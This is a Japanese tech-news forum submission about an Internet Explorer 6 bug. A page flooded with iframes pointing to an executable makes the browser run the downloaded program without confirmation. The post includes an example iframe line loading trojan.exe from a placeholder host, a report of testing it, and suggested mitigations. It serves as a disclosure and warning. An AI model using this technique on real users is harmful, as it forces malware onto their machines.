パスワードを忘れた? アカウント作成
771288 submission
インターネットエクスプローラ

ブラクラ状態の後にダウンロードプログラムを強制実行するIE 6

タレコミ by jbeef
jbeef 曰く、
5月16日のセキュリティホールmemoでもとりあげられているように、IE 6にバグがあり、<iframe src="http://example.com/trojan.exe">などが無数に書かれたHTMLページにアクセスすると、ダウンロードした trojan.exe が確認なしに起動してしまうという。Nimda級のワームに悪用されるおそれがあり危険だ。
実際に試してみたところ、最初は「ファイルのダウンロード」確認ウィンドウが現れて「開く」「保存」「キャンセル」を選択させられるが、これが大量に開いて、いわゆるブラクラ状態となる。ここで急いでWindowsのタスクマネージャを開いてプロセスを終了させようとしても、間に合わず、ついにはなぜか、ダウンロードしたプログラムが起動してしまった。
回避方法として、ブラクラ状態になったら即座にネットワークケーブルを外すことが有効のように見えた。ダウンロードがそれ以上進まなくなるからだ。ただしそれで常に避けられるかはわからない。
根本的な解決のためには、そもそも大量のウィンドウが現れること自体を防ぐべきではなかろうか。同時処理数に上限を設けないことは、ある意味美しい設計ではある(組み込み機器にありがちな上限固定設計に比べて)のだが、ブラクラを防ぐために上限を設けるのはどうだろうか。
typodupeerror

ハッカーとクラッカーの違い。大してないと思います -- あるアレゲ

読み込み中...